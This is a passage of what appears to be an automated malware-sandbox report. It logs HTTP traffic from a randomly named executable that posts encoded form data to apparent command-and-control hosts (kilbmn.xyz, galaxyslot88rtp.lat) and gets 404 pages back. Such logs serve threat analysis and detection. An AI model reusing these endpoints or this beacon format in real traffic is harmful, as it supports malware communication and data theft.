                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  6192.168.2.1049982162.0.238.246806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:38:56.252007961 CEST797OUTPOST /a8og/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 218
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.kilbmn.xyz
                                                                  Origin: http://www.kilbmn.xyz
                                                                  Referer: http://www.kilbmn.xyz/a8og/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Raw: 45 5a 32 6c 6f 3d 33 31 37 4a 35 43 36 51 56 7a 58 41 35 4d 31 4a 76 67 53 4a 45 78 62 45 36 6b 64 4c 78 6f 38 4c 41 4a 48 32 4d 67 36 39 5a 51 62 68 30 68 51 37 36 66 41 38 67 33 32 49 61 7a 6e 57 51 46 77 51 47 78 39 4b 42 35 4f 48 59 64 41 6b 4d 74 55 44 70 4b 69 55 64 67 31 42 34 53 76 4f 69 50 66 43 49 6e 6a 4e 4d 31 4e 4c 4c 37 56 6a 2b 4c 64 73 68 52 4d 59 79 41 69 52 46 6f 4a 4a 45 74 38 2f 48 39 32 6b 31 57 49 37 49 6c 2b 63 4f 4b 42 7a 57 2f 66 58 4b 5a 65 4b 62 6b 67 4b 43 59 78 7a 39 76 6e 51 54 69 54 66 42 2f 59 2f 78 55 36 41 39 36 36 69 41 4e 4d 32 77 7a 6f 52 44 5a 2b 64 4e 47 48 49 4a 6b 76 57 34 2b 69 47 48 73 53 4c 35 67 3d 3d
                                                                  Data Ascii: EZ2lo=317J5C6QVzXA5M1JvgSJExbE6kdLxo8LAJH2Mg69ZQbh0hQ76fA8g32IaznWQFwQGx9KB5OHYdAkMtUDpKiUdg1B4SvOiPfCInjNM1NLL7Vj+LdshRMYyAiRFoJJEt8/H92k1WI7Il+cOKBzW/fXKZeKbkgKCYxz9vnQTiTfB/Y/xU6A966iANM2wzoRDZ+dNGHIJkvW4+iGHsSL5g==
                                                                  Oct 7, 2024 10:38:57.858441114 CEST595INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 07 Oct 2024 08:38:56 GMT
                                                                  Server: Apache
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Content-Length: 389
                                                                  X-XSS-Protection: 1; mode=block
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                                                  Oct 7, 2024 10:38:57.859232903 CEST595INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 07 Oct 2024 08:38:56 GMT
                                                                  Server: Apache
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Content-Length: 389
                                                                  X-XSS-Protection: 1; mode=block
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                                                  Oct 7, 2024 10:38:57.859998941 CEST595INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 07 Oct 2024 08:38:56 GMT
                                                                  Server: Apache
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Content-Length: 389
                                                                  X-XSS-Protection: 1; mode=block
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  7192.168.2.1049983162.0.238.246806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:38:58.790831089 CEST1810OUTPOST /a8og/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1230
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.kilbmn.xyz
                                                                  Origin: http://www.kilbmn.xyz
                                                                  Referer: http://www.kilbmn.xyz/a8og/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Raw: 45 5a 32 6c 6f 3d 33 31 37 4a 35 43 36 51 56 7a 58 41 35 4d 31 4a 76 67 53 4a 45 78 62 45 36 6b 64 4c 78 6f 38 4c 41 4a 48 32 4d 67 36 39 5a 51 54 68 30 58 73 37 36 2f 38 38 68 33 32 49 5a 7a 6e 74 51 46 78 51 47 78 6c 47 42 34 79 58 59 66 49 6b 4f 4b 55 44 76 2f 57 55 58 67 31 42 77 79 76 50 2f 2f 66 74 49 6e 7a 52 4d 31 64 4c 4c 37 56 6a 2b 49 46 73 32 51 4d 59 77 41 69 53 53 59 4a 4e 53 64 38 48 48 2b 47 65 31 57 63 4e 49 57 6d 63 4f 75 6c 7a 56 4d 6e 58 43 5a 65 49 59 6b 68 58 43 59 74 57 39 72 50 36 54 68 50 68 42 38 49 2f 30 42 2f 68 69 65 79 6d 65 2b 38 62 78 31 77 6e 4d 4e 53 39 42 79 36 38 50 47 4b 50 6a 73 6e 34 52 66 57 4f 6e 67 48 79 6e 33 51 53 4c 66 2f 68 37 6b 71 38 73 4c 64 65 2f 50 53 67 2f 55 42 33 6a 45 4f 42 37 65 31 64 62 33 4a 73 61 53 75 48 2f 63 34 39 74 4f 63 39 70 56 55 34 33 6a 57 30 74 53 71 41 46 70 73 44 78 72 75 66 49 57 61 6c 71 72 4f 4c 65 58 2f 65 6f 76 67 4e 53 53 44 66 79 41 70 50 6d 48 30 48 6c 4f 4a 50 45 54 51 47 55 50 75 44 41 38 50 41 32 6b 35 48 46 79 37 59 [TRUNCATED]
                                                                  Data Ascii: EZ2lo=317J5C6QVzXA5M1JvgSJExbE6kdLxo8LAJH2Mg69ZQTh0Xs76/88h32IZzntQFxQGxlGB4yXYfIkOKUDv/WUXg1BwyvP//ftInzRM1dLL7Vj+IFs2QMYwAiSSYJNSd8HH+Ge1WcNIWmcOulzVMnXCZeIYkhXCYtW9rP6ThPhB8I/0B/hieyme+8bx1wnMNS9By68PGKPjsn4RfWOngHyn3QSLf/h7kq8sLde/PSg/UB3jEOB7e1db3JsaSuH/c49tOc9pVU43jW0tSqAFpsDxrufIWalqrOLeX/eovgNSSDfyApPmH0HlOJPETQGUPuDA8PA2k5HFy7YqI++Tq0njDZJ6E8zsPv1qt6FVT24yu24FZ/SdZfI5Wmjekrixj0DVvluSdxQWk01Tv+y6KBHbplgkOYJ4myPeqCEprkU71EgzDAYU/MVg6fABbormcw2+GmjDjkilCitHbu9vhLLljKCNCcDQW0jM/vZuL0VyN6h8d0ssBI9TepxqcioVaxhitD2rcnqYfwhxFwwxjqZ2BAYfY3qmgj9cZFri+GJFlHCur92YjZ8+aRHg8IHkjTP7uUS7P2O9siZUr8wgqxIWw6r71qk87TLf62CF0K474nZntzgqLVpDvIrdPOtZDzbn6gPfijR7NH2PMEjG4pmzpzGGmihT2DvsptQMTVo8ZDYdl5clUnpqBWArQX8HJKqyuHeUuVm0NOhKP9jIcWuKaQFAtzTzAS+SWZOVILm0HN8/28Um/lpdRkV+yHfG7pUEgLWjn7VR95MCDQSpoWfIbYfNvepVEdASPv29qtOfrf0AhMytfpklm2X/dso1endvKqLfwBKZ6H7AWflnHeMVLEUwVr7U3+c21n6eHEMjesDuo2k0q6r24MtsjqVCmXrlKFYG8aMvvGqPsWmq7s06eGhM6rgLdiD3Hil2mHI/B+wvZt0vkMCBrxGmPg3w4I4V9Krm4bvKXC9ccaP29ezzq0UiMwSj93x4TNn1hIeWObn3Q [TRUNCATED]
                                                                  Oct 7, 2024 10:38:59.405152082 CEST595INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 07 Oct 2024 08:38:59 GMT
                                                                  Server: Apache
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Content-Length: 389
                                                                  X-XSS-Protection: 1; mode=block
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  8192.168.2.1049984162.0.238.246806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:39:01.684482098 CEST513OUTGET /a8og/?EZ2lo=63Tp62CKGmWe748Q5xeLHwHqlS9/zq85FZX5ThSUZXnn1SRB3dZnoH27TzC6blggGQlMUKSAP7YLOcUQh9GTRQVuzTmijcvuIWv8RUIdN7d1j+xO0w==&7NP=7FXXUPl HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  Host: www.kilbmn.xyz
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Oct 7, 2024 10:39:02.300024033 CEST610INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 07 Oct 2024 08:39:02 GMT
                                                                  Server: Apache
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Content-Length: 389
                                                                  X-XSS-Protection: 1; mode=block
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  9192.168.2.104998546.17.172.49806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:39:09.179605007 CEST800OUTPOST /zkan/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 194
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.galaxyslot88rtp.lat
                                                                  Origin: http://www.galaxyslot88rtp.lat
                                                                  Referer: http://www.galaxyslot88rtp.lat/zkan/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
                                                                  Data Raw: 45 5a 32 6c 6f 3d 33 62 6f 7a 30 46 77 5a 6f 62 68 41 36 5a 4c 49 2b 4b 67 47 69 32 53 56 42 45 56 65 61 6e 5a 2b 2b 42 75 77 71 42 69 75 4c 43 72 4c 51 71 36 54 6a 30 32 62 32 52 64 4e 42 77 34 4a 73 69 34 7a 4d 59 4e 71 43 35 6a 64 5a 61 45 69 66 55 2f 68 51 5a 75 6b 42 75 54 45 48 52 6b 44 2f 39 31 67 6b 49 32 67 64 35 52 42 67 5a 30 52 6b 6f 57 47 42 5a 2f 53 38 54 6a 56 43 63 4c 4f 57 63 6a 69 6e 63 50 4e 4a 63 63 5a 6f 44 2f 5a 52 69 73 71 65 6d 63 42 34 34 6d 2b 72 41 33 44 51 71 53 4b 53 72 44 50 2b 5a 68 74 63 4d 6b 37 63 41 77 77 66 52 32 4f 59 44 51 6a 66 75 52 56
                                                                  Data Ascii: EZ2lo=3boz0FwZobhA6ZLI+KgGi2SVBEVeanZ++BuwqBiuLCrLQq6Tj02b2RdNBw4Jsi4zMYNqC5jdZaEifU/hQZukBuTEHRkD/91gkI2gd5RBgZ0RkoWGBZ/S8TjVCcLOWcjincPNJccZoD/ZRisqemcB44m+rA3DQqSKSrDP+ZhtcMk7cAwwfR2OYDQjfuRV
                                                                  Oct 7, 2024 10:39:10.092828035 CEST1236INHTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 1251
                                                                  date: Mon, 07 Oct 2024 08:39:09 GMT
                                                                  server: LiteSpeed
                                                                  platform: hostinger
                                                                  strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                  x-xss-protection: 1; mode=block
                                                                  x-content-type-options: nosniff
                                                                  vary: User-Agent
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12
                                                                  Oct 7, 2024 10:39:10.092852116 CEST431INData Raw: 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78
                                                                  Data Ascii: px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by L


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  10192.168.2.104998646.17.172.49806332C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 7, 2024 10:39:11.728627920 CEST824OUTPOST /zkan/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 218
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Host: www.galaxyslot88rtp.lat
                                                                  Origin: http://www.galaxyslot88rtp.lat
                                                                  Referer: http://www.galaxyslot88rtp.lat/zkan/
                                                                  User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/43.0.2357.51 Mobile/11D167 Safari/9537.53
